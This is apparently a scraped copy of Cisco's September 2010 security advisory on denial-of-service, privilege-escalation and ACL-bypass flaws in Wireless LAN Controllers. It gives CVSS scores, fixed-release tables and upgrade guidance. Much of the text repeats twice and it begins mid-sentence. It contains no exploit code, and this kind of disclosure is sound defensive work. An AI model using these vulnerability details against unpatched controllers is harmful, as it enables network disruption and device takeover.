calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss CSCta56653 - WLC may reload when receiving crafted IKE packets CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed CSCtd16938 - WLC crash after passing invalid arguments to emweb CVSS Base Score - 6.8 Access Vector - Network Access Complexity - Low Authentication - Single Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 5.6 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed CSCtc91431, CSCsz66726, and CSCtc93837- Privilege Escalation vulnerabilities CVSS Base Score - 9.0 Access Vector - Network Access Complexity - Low Authentication - Single Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 7.8 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed CSCta66931, CSCtf36051 - CPU ACL bypass vulnerabilities CVSS Base Score - 5.0 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Partial Integrity Impact - None Availability Impact - None CVSS Temporal Score - 4.1 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the DoS vulnerabilities could cause an affected device to reload. Repeated exploitation could result in a sustained DoS condition. Successful exploitation of the ACL bypass vulnerabilities could allow an attacker to bypass policies that should be enforced by CPU-based ACLs. Software Versions and Fixes =========================== When considering software upgrades, also consult: http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. If a given release train is vulnerable, then the earliest possible releases that contain the fix (along with the anticipated date of availability for each, if applicable) are listed in the "First Fixed Release" column of the table. A device running a release in the given train that is earlier than the release in a specific column (less than the First Fixed Release) is known to be vulnerable. +-------------------------------------------------------------------+ | Vulnerability/Bug ID | Affected | First Fixed | | | Release | Version | |----------------------------------------+----------+---------------| | | 3.2 | 3.2.215.0 | | |----------+---------------| | | | Vulnerable; | | | 4.1 | Migrate to | | | | 4.2 | | |----------+---------------| | | | Vulnerable; | | | 4.1M | Migrate to | | | | 4.2M | | |----------+---------------| | | 4.2 | 4.2.205.0 | | |----------+---------------| | | 4.2M | 4.2.207.54M | | IKE DoS Vulnerability (CSCta56653) |----------+---------------| | | | Vulnerable; | | | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | 5.2.193.11 | | |----------+---------------| | | 6.0 | 6.0.188.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | |----------------------------------------+----------+---------------| | | 3.2 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1M | Not | | | | Vulnerable | | |----------+---------------| | | 4.2 | 4.2.209.0 | | |----------+---------------| | | 4.2M | 4.2.207.54M | | |----------+---------------| | HTTP DoS Vulnerability (CSCtd16938) | | Vulnerable; | | | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | 5.2.193.11 | | |----------+---------------| | | 6.0 | 6.0.196.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | |----------------------------------------+----------+---------------| | | 3.2 | Not | | | | Vulnerable | | |----------+---------------| | | | Vulnerable; | | | 4.1 | Migrate to | | | | 4.2 | | |----------+---------------| | | | Vulnerable; | | | 4.1 M | Migrate to | | | | 4.2M | | |----------+---------------| | | 4.2 | 4.2.209.0 | | |----------+---------------| | Privilege Escalation Vulnerabilities | 4.2M | 4.2.207.54M | | (CSCtc91431, CSCsz66726, and |----------+---------------| | CSCtc93837) | | Vulnerable; | | | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | 5.2.193.11 | | |----------+---------------| | | 6.0 | 6.0.188.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | |----------------------------------------+----------+---------------| | | 3.2 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1M | Not | | | | Vulnerable | | |----------+---------------| | | 4.2 | 4.2.207.0 | | |----------+---------------| | | 4.2M | 4.2.207.54M | | |----------+---------------| | ACL Bypass Vulnerabilities (CSCta66931 | | Vulnerable; | | and CSCtf36051) | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | Not | | | | Vulnerable | | |----------+---------------| | | 6.0 | 6.0.199.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | +-------------------------------------------------------------------+ Recommended Releases ~~~~~~~~~~~~~~~~~~~~ The "Recommended Release" table lists the releases which have fixes for all the published vulnerabilities at the time of this Advisory. Cisco recommends upgrading to a release equal to or later than the release in the "Recommended Releases" table. +-------------------------------------------------------------------+ | Affected Release | Recommended Release | |----------------------+--------------------------------------------| | 3.2 | 3.2.215.0 | |----------------------+--------------------------------------------| | 4.1 | Vulnerable; Migrate to 4.2 | |----------------------+--------------------------------------------| | 4.1M | Vulnerable; Migrate to 4.2M | |----------------------+--------------------------------------------| | 4.2 | 4.2.209.0 | |----------------------+--------------------------------------------| | 4.2M | 4.2.207.54M | |----------------------+--------------------------------------------| | 5.0 | Vulnerable; Migrate to 6.0 | |----------------------+--------------------------------------------| | 5.1 | Vulnerable; Migrate to 6.0 | |----------------------+--------------------------------------------| | 5.2 | Non FIPS Customers migrate to 6.0 | |----------------------+--------------------------------------------| | 6.0 | 6.0.199.4 | |----------------------+--------------------------------------------| | 7.0 | Not Vulnerable | +-------------------------------------------------------------------+ Note: Cisco WLC Software version 5.2.193.11 is a FIPS certified image. Customers not running FIPS images are recommended to migrate to Cisco WLC software 6.0.199.4 or later. Customers running 4.1M with a mixture of LAP1505/LAP1510 and LAP1522/ LAP1524 units will need to refer to the Mesh and Mainstream Releases on the Controller section of the document Cisco Wireless Mesh Access Points, Design and Deployment Guide, Release 7.0. Workarounds =========== There are no available workarounds to mitigate any of these vulnerabilities. Additional mitigations that can be deployed on Cisco devices in the network are available in the Cisco Applied Mitigation Bulletin companion document for this advisory, which is available at the following link: http://www.cisco.com/warp/public/707/cisco-amb-20100908-wlc.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at: http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to: http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were found during internal testing and during the troubleshooting of customer service requests. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20100908-wlc.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +-----------------------------------------+ | Revision | | Initial | | 1.0 | 2010-September-08 | public | | | | release. | +-----------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: http://www.cisco.com/go/psirt -----BEGIN PGP SIGNATURE----- iD8DBQFMh6MB86n/Gc8U/uARAkAoAJ49gL4UWcPviOVj7qBoEjTA0tLQ4QCfTlem QI2QHDaZGejlgOifWafhaW8= =518m -----END PGP SIGNATURE-----

Cisco Wireless LAN Controller (WLC) software, possibly 4.2 through 6.0, allows remote authenticated users to bypass intended access restrictions and modify the configuration, and possibly obtain administrative privileges, via unspecified vectors, a different vulnerability than CVE-2010-2843 and CVE-2010-3033. This issue is tracked by Cisco Bug ID CSCtc91431. This may lead to a full compromise of the affected device or aid in further attacks. Wireless LAN Controller firmware 4.2 and later are affected. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Multiple Vulnerabilities in Cisco Wireless LAN Controllers Advisory ID: cisco-sa-20100908-wlc Revision 1.0 For Public Release 2010 September 08 1600 UTC (GMT) +--------------------------------------------------------------------- Summary ======= The Cisco Wireless LAN Controller (WLC) product family is affected by these vulnerabilities: * Two denial of service (DoS) vulnerabilities * Three privilege escalation vulnerabilities * Two access control list (ACL) bypass vulnerabilities Note: These vulnerabilities are independent of one another. Cisco has released free software updates that address these vulnerabilities. There are no workarounds to mitigate these vulnerabilities. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20100908-wlc.shtml Affected Products ================= Vulnerable Products +------------------ These products are each affected by at least one vulnerability covered in this Security Advisory: * Cisco 2000 Series WLCs * Cisco 2100 Series WLCs * Cisco 4100 Series WLCs * Cisco 4400 Series WLCs * Cisco 5500 Series WLCs * Cisco Wireless Services Modules (WiSMs) * Cisco WLC Modules for Integrated Services Routers (ISRs) * Cisco Catalyst 3750G Integrated WLCs DoS Vulnerabilities ~~~~~~~~~~~~~~~~~~~ The Cisco WLC product family is affected by two DoS vulnerabilities: * Internet Key Exchange (IKE) DoS Vulnerability * HTTP DoS Vulnerability The IKE DoS vulnerability affects Cisco WLC software versions 3.2 and later. The HTTP DoS vulnerability affects Cisco WLC software versions 4.2 and later. Privilege Escalation Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The privilege escalation vulnerabilities affect Cisco WLC software versions 4.2 and later. CPU ACL Bypass Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ One of the two ACL bypass vulnerabilities affects Cisco WLC software versions 4.1 and later. The second ACL bypass vulnerability affects Cisco WLC software versions 6.0.x. Determination of Software Versions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Administrators can use these instructions to determine the software version that is running on the Cisco WLCs (using the web or command-line interface) or on the Cisco WiSM (using commands on the Cisco Catalyst 6500 Series Switch and Cisco 7600 Series Router). Cisco Wireless Controllers ~~~~~~~~~~~~~~~~~~~~~~~~~~ To determine the WLC version that is running in a given environment, use one of these methods: * In the web interface, choose the "Monitor" tab, click "Summary" in the left pane, and note the "Software" Version field. Note: Customers who use a Cisco WLC Module in an ISR will need to issue the "service-module wlan-controller <slot/port> session" command prior to performing the next step on the command line. Customers who use a Cisco Catalyst 3750G Switch with an integrated WLC Module will need to issue the "session <Stack-Member-Number> processor 1 session" command prior to performing the next step on the command line. * From the command-line interface, type "show sysinfo" and note the "Product Version" field, as shown in this example: (Cisco Controller)> show sysinfo Manufacturer's Name.. Cisco Systems Inc. Product Name......... Cisco Controller Product Version...... 5.1.151.0 RTOS Version......... Linux-2.6.10_mvl401 Bootloader Version... 4.0.207.0 Build Type........... DATA + WPS <output suppressed> Cisco WiSMs ~~~~~~~~~~~ Use the "show wism module <module number> controller 1 status" command on a Cisco Catalyst 6500 Series Switch and Cisco 7600 Series Router if they are using a WiSM. Note the software version as demonstrated in this example, which shows version 5.1.151.0: Router# show wism module 3 controller 1 status WiSM Controller 1 in Slot 3 Operational Status of the Controller : Oper-Up Service VLAN : 192 Service Port : 10 Service Port Mac Address : 0011.92ff.8742 Service IP Address : 192.168.10.1 Management IP Address : 192.168.1.123 Software Version : 5.1.151.0 Port Channel Number : 288 Allowed vlan list : 30,40 Native VLAN ID : 40 WCP Keep Alive Missed : 0 Products Confirmed Not Vulnerable +-------------------------------- No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= Cisco WLCs and Cisco WiSMs are responsible for system-wide wireless LAN functions, such as security policies, intrusion prevention, RF management, quality of service (QoS), and mobility. The following are the details about these vulnerabilities. IKE Denial of Service Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ An attacker with the ability to send a malicious IKE packet to an affected Cisco WLC could cause the device to crash and reload. This vulnerability can be exploited from both wired and wireless segments. Note: IKE is enabled by default in the WLC and cannot be disabled. Only traffic destined to the Cisco WLC could trigger this vulnerability. Transient traffic will not trigger this vulnerability. HTTP Denial of Service Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ An authenticated attacker with the ability to send a series of malicious HTTP packets to an affected Cisco WLC could cause the device to reload. This vulnerability can be exploited from both wired and wireless segments. A TCP three-way handshake is needed in order to exploit this vulnerability. Note: Only traffic destined to the Cisco WLC could trigger this vulnerability. Transient traffic will not trigger this vulnerability. WebAuth or guest access is not affected by this vulnerability. After ACLs are defined, they can be applied to the management interface, the access point manager (AP-manager) interface, or any of the dynamic interfaces for client data traffic or to the Network Processing Unit (NPU) interface for traffic to the controller CPU. Two vulnerabilities exist in the Cisco WLCs that could allow an unauthenticated attacker to bypass policies that should be enforced by CPU-based ACLs. No other ACL types are affected by these vulnerabilities. Note: CPU-based ACLs are configured and applied by navigating to Security > Access Control Lists > CPU Access Control Lists in the Cisco WLC web management interface. When CPU-based ACLs are enabled, they are applicable to both wireless and wired traffic. Vulnerability Scoring Details ============================= Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss CSCta56653 - WLC may reload when receiving crafted IKE packets CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed CSCtd16938 - WLC crash after passing invalid arguments to emweb CVSS Base Score - 6.8 Access Vector - Network Access Complexity - Low Authentication - Single Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 5.6 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed CSCtc91431, CSCsz66726, and CSCtc93837- Privilege Escalation vulnerabilities CVSS Base Score - 9.0 Access Vector - Network Access Complexity - Low Authentication - Single Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 7.8 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed CSCta66931, CSCtf36051 - CPU ACL bypass vulnerabilities CVSS Base Score - 5.0 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Partial Integrity Impact - None Availability Impact - None CVSS Temporal Score - 4.1 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the DoS vulnerabilities could cause an affected device to reload. Repeated exploitation could result in a sustained DoS condition. Successful exploitation of the ACL bypass vulnerabilities could allow an attacker to bypass policies that should be enforced by CPU-based ACLs. Software Versions and Fixes =========================== When considering software upgrades, also consult: http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. If a given release train is vulnerable, then the earliest possible releases that contain the fix (along with the anticipated date of availability for each, if applicable) are listed in the "First Fixed Release" column of the table. A device running a release in the given train that is earlier than the release in a specific column (less than the First Fixed Release) is known to be vulnerable. +-------------------------------------------------------------------+ | Vulnerability/Bug ID | Affected | First Fixed | | | Release | Version | |----------------------------------------+----------+---------------| | | 3.2 | 3.2.215.0 | | |----------+---------------| | | | Vulnerable; | | | 4.1 | Migrate to | | | | 4.2 | | |----------+---------------| | | | Vulnerable; | | | 4.1M | Migrate to | | | | 4.2M | | |----------+---------------| | | 4.2 | 4.2.205.0 | | |----------+---------------| | | 4.2M | 4.2.207.54M | | IKE DoS Vulnerability (CSCta56653) |----------+---------------| | | | Vulnerable; | | | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | 5.2.193.11 | | |----------+---------------| | | 6.0 | 6.0.188.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | |----------------------------------------+----------+---------------| | | 3.2 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1M | Not | | | | Vulnerable | | |----------+---------------| | | 4.2 | 4.2.209.0 | | |----------+---------------| | | 4.2M | 4.2.207.54M | | |----------+---------------| | HTTP DoS Vulnerability (CSCtd16938) | | Vulnerable; | | | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | 5.2.193.11 | | |----------+---------------| | | 6.0 | 6.0.196.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | |----------------------------------------+----------+---------------| | | 3.2 | Not | | | | Vulnerable | | |----------+---------------| | | | Vulnerable; | | | 4.1 | Migrate to | | | | 4.2 | | |----------+---------------| | | | Vulnerable; | | | 4.1 M | Migrate to | | | | 4.2M | | |----------+---------------| | | 4.2 | 4.2.209.0 | | |----------+---------------| | Privilege Escalation Vulnerabilities | 4.2M | 4.2.207.54M | | (CSCtc91431, CSCsz66726, and |----------+---------------| | CSCtc93837) | | Vulnerable; | | | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | 5.2.193.11 | | |----------+---------------| | | 6.0 | 6.0.188.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | |----------------------------------------+----------+---------------| | | 3.2 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1M | Not | | | | Vulnerable | | |----------+---------------| | | 4.2 | 4.2.207.0 | | |----------+---------------| | | 4.2M | 4.2.207.54M | | |----------+---------------| | ACL Bypass Vulnerabilities (CSCta66931 | | Vulnerable; | | and CSCtf36051) | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | Not | | | | Vulnerable | | |----------+---------------| | | 6.0 | 6.0.199.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | +-------------------------------------------------------------------+ Recommended Releases ~~~~~~~~~~~~~~~~~~~~ The "Recommended Release" table lists the releases which have fixes for all the published vulnerabilities at the time of this Advisory. Cisco recommends upgrading to a release equal to or later than the release in the "Recommended Releases" table. +-------------------------------------------------------------------+ | Affected Release | Recommended Release | |----------------------+--------------------------------------------| | 3.2 | 3.2.215.0 | |----------------------+--------------------------------------------| | 4.1 | Vulnerable; Migrate to 4.2 | |----------------------+--------------------------------------------| | 4.1M | Vulnerable; Migrate to 4.2M | |----------------------+--------------------------------------------| | 4.2 | 4.2.209.0 | |----------------------+--------------------------------------------| | 4.2M | 4.2.207.54M | |----------------------+--------------------------------------------| | 5.0 | Vulnerable; Migrate to 6.0 | |----------------------+--------------------------------------------| | 5.1 | Vulnerable; Migrate to 6.0 | |----------------------+--------------------------------------------| | 5.2 | Non FIPS Customers migrate to 6.0 | |----------------------+--------------------------------------------| | 6.0 | 6.0.199.4 | |----------------------+--------------------------------------------| | 7.0 | Not Vulnerable | +-------------------------------------------------------------------+ Note: Cisco WLC Software version 5.2.193.11 is a FIPS certified image. Customers not running FIPS images are recommended to migrate to Cisco WLC software 6.0.199.4 or later. Customers running 4.1M with a mixture of LAP1505/LAP1510 and LAP1522/ LAP1524 units will need to refer to the Mesh and Mainstream Releases on the Controller section of the document Cisco Wireless Mesh Access Points, Design and Deployment Guide, Release 7.0. Workarounds =========== There are no available workarounds to mitigate any of these vulnerabilities. Additional mitigations that can be deployed on Cisco devices in the network are available in the Cisco Applied Mitigation Bulletin companion document for this advisory, which is available at the following link: http://www.cisco.com/warp/public/707/cisco-amb-20100908-wlc.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at: http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to: http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were found during internal testing and during the troubleshooting of customer service requests. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20100908-wlc.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +-----------------------------------------+ | Revision | | Initial | | 1.0 | 2010-September-08 | public | | | | release. | +-----------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: http://www.cisco.com/go/psirt -----BEGIN PGP SIGNATURE----- iD8DBQFMh6MB86n/Gc8U/uARAkAoAJ49gL4UWcPviOVj7qBoEjTA0tLQ4QCfTlem QI2QHDaZGejlgOifWafhaW8= =518m -----END PGP SIGNATURE-----